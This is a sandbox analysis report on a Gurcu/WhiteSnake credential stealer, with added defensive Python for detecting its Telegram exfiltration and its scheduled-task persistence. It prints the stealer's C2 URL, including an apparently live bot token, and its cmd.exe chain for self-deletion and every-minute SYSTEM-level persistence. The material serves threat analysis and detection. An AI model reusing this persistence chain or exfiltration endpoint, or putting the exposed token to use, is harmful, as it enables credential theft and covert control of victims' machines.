Resubmissions

10-04-2024 02:52

240410-dcqxlaff2v 10

10-04-2024 02:52

240410-dcqltscc72 10

10-04-2024 02:51

240410-dcm6pscc67 10

10-04-2024 02:51

240410-dcmj6scc66 10

14-10-2023 04:10

231014-erhp7sga6y 10

Analysis

  • max time kernel
    359s
  • max time network
    565s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64, arch:x86, image:win7-20231129-en, locale:en-us, os:windows7-x64, system
  • submitted
    10-04-2024 02:51

General

  • Target

    f21559ac7c67d871d4f05.exe

  • Size

    327KB

  • MD5

    78fd6df30f791c7b5f45dca0b4c952a5

  • SHA1

    d977ca82da0850eb5d4e69c9c657d1a41fb9c44d

  • SHA256

    dba8f020ac6d09728422932492657fea3f0a95754cd279f5a949b6982bd32129

  • SHA512

    abf0efb2412c522fbb7f6725a548e8d6a8bc045801a4dd8652a544a1527b99647140ad4843c41a6b00a728a5d8361c7e2ea80eba8ee3b291238729277dad228d

  • SSDEEP

    6144:Vc6sWfGY/yODx332tOIXlU1QWZxXAnuHW9bbGDwVdqe1mM:Ps+CXIAuGG8dA

Malware Config

Extracted

Family

gurcu

C2

https://api.telegram.org/bot5968091729:AAHVag_ncx5c5AIYERGTqv9kr7clJT1_HDU/sendMessage?chat_id=-1001962300376
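The C2 above is a Telegram Bot API endpoint: the `bot<id>:<secret>` path segment is the bot token that authenticates the sender, and `chat_id` selects the channel that receives the stolen data. The token is therefore a live credential and should be handled as one in tickets and IOC feeds, while the numeric bot id is the stable value to pivot on. The Python below is an added example, not part of the report or of any sandbox tooling: it parses that URL form, redacts the secret for reporting, and sweeps a constructed proxy log for Bot API exfiltration calls. The log lines, client IPs and the `ipcheck.example.net` host are made up; the list of exfiltration methods and the 30 to 60 character bound on the secret are my assumptions, while the hostname and the sample URL are the report's own.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

# C2 URL as extracted in the report (the page's own value).
REPORT_C2 = ("https://api.telegram.org/bot5968091729:AAHVag_ncx5c5AIYERGTqv9kr7clJT1_HDU"
             "/sendMessage?chat_id=-1001962300376")

# Bot API paths look like /bot<numeric id>:<secret>/<method>. The sample secret is
# 35 characters; accepting 30-60 is an assumption to tolerate other token lengths.
BOT_PATH_RE = re.compile(
    r"^/bot(?P<bot_id>\d+):(?P<secret>[A-Za-z0-9_-]{30,60})/(?P<method>[A-Za-z]+)/?$")

# Bot API methods that carry data out of the host (sendMessage is the one in the report).
EXFIL_METHODS = {"sendMessage", "sendDocument", "sendPhoto", "sendMediaGroup"}


@dataclass(frozen=True)
class TelegramBotC2:
    bot_id: str
    secret: str
    method: str
    chat_id: Optional[str]

    def redacted(self) -> str:
        # Keep the bot id (hunting pivot) and a 4-character prefix of the secret so the
        # indicator is recognisable without being a usable credential.
        return f"{self.bot_id}:{self.secret[:4]}...[redacted]"


def parse_telegram_c2(url: str) -> Optional[TelegramBotC2]:
    """Return the bot id, secret, method and chat_id of a Bot API URL, or None."""
    parts = urlsplit(url)
    if (parts.hostname or "").lower() != "api.telegram.org":
        return None
    m = BOT_PATH_RE.match(parts.path)
    if not m:
        return None
    chat = parse_qs(parts.query).get("chat_id", [None])[0]
    return TelegramBotC2(m["bot_id"], m["secret"], m["method"], chat)


# Constructed proxy log: "<timestamp> <client ip> <http method> <url>", one request per line.
SAMPLE_PROXY_LOG = """\
2024-04-10T02:52:10Z 10.0.0.15 GET https://www.microsoft.com/en-us/
2024-04-10T02:52:31Z 10.0.0.15 GET https://ipcheck.example.net/?format=text
2024-04-10T02:52:44Z 10.0.0.15 POST https://api.telegram.org/bot5968091729:AAHVag_ncx5c5AIYERGTqv9kr7clJT1_HDU/sendMessage?chat_id=-1001962300376
2024-04-10T02:53:02Z 10.0.0.22 GET https://telegram.org/
"""


def hunt_proxy_log(log_text: str, known_bot_ids=frozenset()) -> List[Tuple[str, str, str]]:
    """(timestamp, client ip, indicator) for each Bot API call that uses an exfil method.
    The indicator names the bot without disclosing its secret."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        ts, client, _http_method, url = fields[:4]
        c2 = parse_telegram_c2(url)
        if c2 is None or c2.method not in EXFIL_METHODS:
            continue
        tag = "known-c2" if c2.bot_id in known_bot_ids else "unknown-bot"
        hits.append((ts, client, f"{tag} bot={c2.redacted()} chat_id={c2.chat_id}"))
    return hits


if __name__ == "__main__":
    for hit in hunt_proxy_log(SAMPLE_PROXY_LOG, {"5968091729"}):
        print(*hit)
```

The host check is deliberate: `telegram.org` and the desktop client's own traffic are not the Bot API, so only `api.telegram.org` with a `/bot<token>/` path is treated as an indicator.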

Signatures

  • Gurcu, WhiteSnake

    Gurcu (also tracked as WhiteSnake) is an information stealer written in C#.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers commonly target stored browser data, which can include saved credentials, cookies and browsing history.

  • Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies system certificate store 2 TTPs 10 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f21559ac7c67d871d4f05.exe
    "C:\Users\Admin\AppData\Local\Temp\f21559ac7c67d871d4f05.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2392
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "f21559ac7c67d871d4f05" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\Nvidia\f21559ac7c67d871d4f05.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\f21559ac7c67d871d4f05.exe" &&START "" "C:\Users\Admin\AppData\Local\Nvidia\f21559ac7c67d871d4f05.exe"
      2⤵
      • Deletes itself
      • Suspicious use of WriteProcessMemory
      PID:3060
      • C:\Windows\system32\chcp.com
        chcp 65001
        3⤵
          PID:2540
        • C:\Windows\system32\PING.EXE
          ping 127.0.0.1
          3⤵
          • Runs ping.exe
          PID:2932
        • C:\Windows\system32\schtasks.exe
          schtasks /create /tn "f21559ac7c67d871d4f05" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\Nvidia\f21559ac7c67d871d4f05.exe" /rl HIGHEST /f
          3⤵
          • Creates scheduled task(s)
          PID:2584
        • C:\Users\Admin\AppData\Local\Nvidia\f21559ac7c67d871d4f05.exe
          "C:\Users\Admin\AppData\Local\Nvidia\f21559ac7c67d871d4f05.exe"
          3⤵
          • Executes dropped EXE
          • Accesses Microsoft Outlook profiles
          • Modifies system certificate store
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2644
          • C:\Windows\system32\WerFault.exe
            C:\Windows\system32\WerFault.exe -u -p 2644 -s 2412
            4⤵
              PID:2692
      • C:\Windows\system32\taskeng.exe
        taskeng.exe {F6C5B17C-521C-4033-B333-6F62E02C7A36} S-1-5-21-3627615824-4061627003-3019543961-1000:SCFGBRBT\Admin:Interactive:[1]
        1⤵
        • Suspicious use of WriteProcessMemory
        PID:2544
        • C:\Users\Admin\AppData\Local\Nvidia\f21559ac7c67d871d4f05.exe
          C:\Users\Admin\AppData\Local\Nvidia\f21559ac7c67d871d4f05.exe
          2⤵
          • Executes dropped EXE
          • Accesses Microsoft Outlook profiles
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          • outlook_office_path
          • outlook_win_path
          PID:1636
          • C:\Windows\system32\WerFault.exe
            C:\Windows\system32\WerFault.exe -u -p 1636 -s 1796
            3⤵
              PID:1328
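The cmd.exe child (PID 3060) above carries the whole persistence chain in one command line: `ping 127.0.0.1` stands in for a sleep, `schtasks /create ... /sc MINUTE ... /rl HIGHEST` re-runs the copy every minute with the highest privileges available to the user, `DEL` removes the original from Temp and `START` launches the copy from `%LOCALAPPDATA%\Nvidia`; the later launch under taskeng.exe (PID 2544) is that task firing. The Python below is an added example, not part of the report: it splits such a `&&` chain, pulls the task name, schedule, run level and target out of the `schtasks` step, and scores the combination. The benign `AcmeBackup` event, its PID 4100 and the threshold of three indicators are constructed assumptions; the PID 3060 command line is the report's own.

```python
import ntpath
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Command line of the cmd.exe child (PID 3060) as recorded in the process tree above.
REPORT_CMDLINE = (
    r'"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && '
    r'schtasks /create /tn "f21559ac7c67d871d4f05" /sc MINUTE '
    r'/tr "C:\Users\Admin\AppData\Local\Nvidia\f21559ac7c67d871d4f05.exe" /rl HIGHEST /f && '
    r'DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\f21559ac7c67d871d4f05.exe" &&'
    r'START "" "C:\Users\Admin\AppData\Local\Nvidia\f21559ac7c67d871d4f05.exe"'
)
# Constructed benign counterpart: an installer creating a daily task under Program Files.
BENIGN_CMDLINE = (
    r'"C:\Windows\System32\cmd.exe" /C schtasks /create /tn "AcmeBackup" /sc DAILY /st 02:00 '
    r'/tr "C:\Program Files\Acme\backup.exe" /f'
)

USER_WRITABLE = re.compile(r"\\(AppData|ProgramData|Temp)\\", re.I)


def split_cmd_chain(cmdline: str) -> List[str]:
    """Strip a leading '"...cmd.exe" /C' and return the individual && steps."""
    body = re.sub(r'^\s*"?[^"]*cmd(?:\.exe)?"?\s+/[cCkK]\s+', "", cmdline)
    return [s.strip() for s in body.split("&&") if s.strip()]


def opt(args: str, name: str) -> Optional[str]:
    """Value of a schtasks-style '/name value' option, quoted or bare."""
    m = re.search(rf'/{name}\s+(?:"([^"]*)"|(\S+))', args, re.I)
    if not m:
        return None
    return m.group(1) if m.group(1) is not None else m.group(2)


def quoted_paths(step: str) -> List[str]:
    return [p for p in re.findall(r'"([^"]*)"', step) if p]


@dataclass
class ChainFinding:
    task_name: Optional[str] = None
    schedule: Optional[str] = None
    run_level: Optional[str] = None
    task_target: Optional[str] = None
    indicators: List[str] = field(default_factory=list)


def analyse_chain(cmdline: str) -> ChainFinding:
    f = ChainFinding()
    deleted: List[str] = []
    started: List[str] = []
    for step in split_cmd_chain(cmdline):
        verb = step.split()[0].lower()
        if verb == "ping" and re.search(r"\b127\.0\.0\.1\b|\blocalhost\b", step, re.I):
            f.indicators.append("ping_loopback_delay")   # cmd.exe has no sleep; ping is the idiom
        elif verb == "schtasks" and re.search(r"/create\b", step, re.I):
            f.task_name, f.schedule = opt(step, "tn"), opt(step, "sc")
            f.run_level, f.task_target = opt(step, "rl"), opt(step, "tr")
            if (f.schedule or "").upper() == "MINUTE":
                f.indicators.append("task_every_minute")
            if (f.run_level or "").upper() == "HIGHEST":
                f.indicators.append("task_runlevel_highest")
            if f.task_target and USER_WRITABLE.search(f.task_target):
                f.indicators.append("task_target_user_writable")
        elif verb in ("del", "erase"):
            deleted += quoted_paths(step)
        elif verb == "start":
            started += quoted_paths(step)
    # Original deleted and a same-named copy launched from elsewhere: self-relocation.
    if any(ntpath.basename(d).lower() == ntpath.basename(s).lower() and d.lower() != s.lower()
           for d in deleted for s in started):
        f.indicators.append("self_delete_and_relaunch_copy")
    return f


def is_suspicious(f: ChainFinding, threshold: int = 3) -> bool:
    return len(f.indicators) >= threshold


def triage(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Score process-creation events (Sysmon Event ID 1 style dicts: PID, Image, CommandLine)."""
    out = []
    for ev in events:
        if not ev.get("Image", "").lower().endswith("\\cmd.exe"):
            continue
        f = analyse_chain(ev["CommandLine"])
        out.append({"PID": ev["PID"], "suspicious": is_suspicious(f),
                    "task": f.task_name, "indicators": f.indicators})
    return out


SAMPLE_EVENTS = [  # constructed: the report's PID 3060 event plus the benign counterpart
    {"PID": "3060", "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": REPORT_CMDLINE},
    {"PID": "4100", "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": BENIGN_CMDLINE},
]

if __name__ == "__main__":
    for result in triage(SAMPLE_EVENTS):
        print(result)
```

Scoring on the combination rather than on `schtasks /create` alone keeps installer-created tasks out of the alert queue; a one-minute schedule, highest run level, a target under a user-writable directory, the loopback ping and the delete-then-relaunch of a same-named binary rarely appear together in legitimate administration.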

Network

MITRE ATT&CK Enterprise v15

Downloads

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

          Filesize

          68KB

          MD5

          29f65ba8e88c063813cc50a4ea544e93

          SHA1

          05a7040d5c127e68c25d81cc51271ffb8bef3568

          SHA256

          1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

          SHA512

          e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

          Filesize

          1KB

          MD5

          a266bb7dcc38a562631361bbf61dd11b

          SHA1

          3b1efd3a66ea28b16697394703a72ca340a05bd5

          SHA256

          df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

          SHA512

          0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          344B

          MD5

          6ea095d1d0dd1cdf1ecf4a30a7daefb0

          SHA1

          c227ebe380f317648e00025d7f8b9edfd73b4be8

          SHA256

          0fb4d8deac188230953c17f9b455ee0cb554206056453084c8cbd9b417a1f43f

          SHA512

          486d05a2ef26f3caedfb971002da7ae663adb753a0455157a0ec01e00fc2acd766f2392fa241986620ad706b2f19792d052cc4f4f9ffc5a861b2eb01aaeb58b2

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          344B

          MD5

          e2bb4fb31f766e474e201c74a84c585a

          SHA1

          deaf3530bff3dc03852d7d58807c70a65b425ffd

          SHA256

          ae8068e1e70ee61bb44c2d8ff3839af1536ce23a23c440994bc21050b5f92f70

          SHA512

          2aa3c954da680b274eb10f246d78f6b929d2b64f652771ff15f6c6ac2f3fb61240172109883ea695807bacc778a9aa77120a4e9a1bf6ddf1ac17e2337c39adc2

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          344B

          MD5

          f833d2dd1aa139434e2fcdae07d80415

          SHA1

          142071c4853c38a8c51c2ed2772010f0f9fd4f58

          SHA256

          330493c48f315eb95ccd2b6068f2cd83e6a0df8febf9f1867e6cc5ab8b13f1f4

          SHA512

          1d7284e7a49e0aa75b4a123fa2db8c37b99a2d49151d5b2281c83c84ee2470ade805ba21e0f401af3dadbbcf9a4811af189c5394cacb39faba42fd02d0800c6d

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          344B

          MD5

          1d41f0d7c175a348d0d1dd7b20e5f89f

          SHA1

          bc548163118376d9ef0b14feff2b46101cd8d250

          SHA256

          de10fbe2a08eab378077ff08f016964b53773e598a8ee1ac1fa4e931ccf46b10

          SHA512

          9ed99b794f76046bf8937fdd3a3779f7d80fdaa3e713c4b46ace1516357695d2ba48b44e3495903ab5d5027a5020dd5363fa4c761e92835d901f5a2e441f9596

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          344B

          MD5

          6cf1607f895e45cb511183b1f710248c

          SHA1

          7ff469f2a6d9d2f75627ac0d64e5b092b8019085

          SHA256

          914d0f04375718fe3133b1a1bde4e5e83010b6a447be19f027ee1ce2c390a19a

          SHA512

          e655669fd15aacda714f7f153ee920ccb8f00f8712f72943218a34a5b2ffa82c1ed37eb83c2e49889292a40fd95f97971b0a4ad1b634742b8d9e3ad3953bfb39

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          344B

          MD5

          b594cd145941cfa110bc23a0600a2316

          SHA1

          36ce36e107b11d98d5de3a0009294259a06bd4fe

          SHA256

          5eec6fc9f46639cb77093752b71b4ffca23bd0e444c964c2563f3aa7a2e1ae69

          SHA512

          760d150592e78b44a3357d1d01faaf9719f06bbe6a02f7af115fc51ee4d8fcf8264313289a87bb6274ea3bf44b7a41dc85db7d4608322eea735b5dc701342cd0

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

          Filesize

          242B

          MD5

          46c71fc6ebc920f538fbdaaac436f167

          SHA1

          551e156fa227963c1afb09f39be6af34a12ac5c7

          SHA256

          c217342dbbd9d51ca3bbe2b5633a45c9fed77e1868db5e66e0548eee2c046789

          SHA512

          6ec717fc27a0270e108987134b00d78fdd5f72cb4fbc07159ddbc7df9558286d03d2262479923e0e323b95100d6f4bf389ed679255edef100dc7825afe40d8ad

        • C:\Users\Admin\AppData\Local\Nvidia\f21559ac7c67d871d4f05.exe

          Filesize

          327KB

          MD5

          78fd6df30f791c7b5f45dca0b4c952a5

          SHA1

          d977ca82da0850eb5d4e69c9c657d1a41fb9c44d

          SHA256

          dba8f020ac6d09728422932492657fea3f0a95754cd279f5a949b6982bd32129

          SHA512

          abf0efb2412c522fbb7f6725a548e8d6a8bc045801a4dd8652a544a1527b99647140ad4843c41a6b00a728a5d8361c7e2ea80eba8ee3b291238729277dad228d

        • C:\Users\Admin\AppData\Local\Temp\Tar2082.tmp

          Filesize

          177KB

          MD5

          435a9ac180383f9fa094131b173a2f7b

          SHA1

          76944ea657a9db94f9a4bef38f88c46ed4166983

          SHA256

          67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

          SHA512

          1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

        • C:\Users\Admin\AppData\Local\z1jp774dks\port.dat

          Filesize

          4B

          MD5

          88bfcf02e7f554f9e9ea350b699bc6a7

          SHA1

          f9fc4123eeaa0b57b9ec04bb5dc952acaf672f45

          SHA256

          04e97796ac4d1ffe851398d3a25afad5f62916ef5ac22f6f10e83192dc15e8c3

          SHA512

          6fd9b434440b4772a894c8bb29ed31cbd6e4b8436dedf1fe2330e4ea129c8fa82e9d1d0ea90cfe063bd6d6edaa839d235f4284c5ce97670d091da453296c0122

        • memory/1636-303-0x000007FEF5270000-0x000007FEF5C5C000-memory.dmp

          Filesize

          9.9MB

        • memory/1636-280-0x000007FEF5270000-0x000007FEF5C5C000-memory.dmp

          Filesize

          9.9MB

        • memory/2392-1-0x000007FEF5C60000-0x000007FEF664C000-memory.dmp

          Filesize

          9.9MB

        • memory/2392-5-0x000007FEF5C60000-0x000007FEF664C000-memory.dmp

          Filesize

          9.9MB

        • memory/2392-2-0x000000001B490000-0x000000001B510000-memory.dmp

          Filesize

          512KB

        • memory/2392-0-0x0000000000AC0000-0x0000000000B18000-memory.dmp

          Filesize

          352KB

        • memory/2644-11-0x000000001B120000-0x000000001B1A0000-memory.dmp

          Filesize

          512KB

        • memory/2644-277-0x000007FEF5270000-0x000007FEF5C5C000-memory.dmp

          Filesize

          9.9MB

        • memory/2644-278-0x000000001B120000-0x000000001B1A0000-memory.dmp

          Filesize

          512KB

        • memory/2644-9-0x0000000000080000-0x00000000000D8000-memory.dmp

          Filesize

          352KB

        • memory/2644-10-0x000007FEF5270000-0x000007FEF5C5C000-memory.dmp

          Filesize

          9.9MB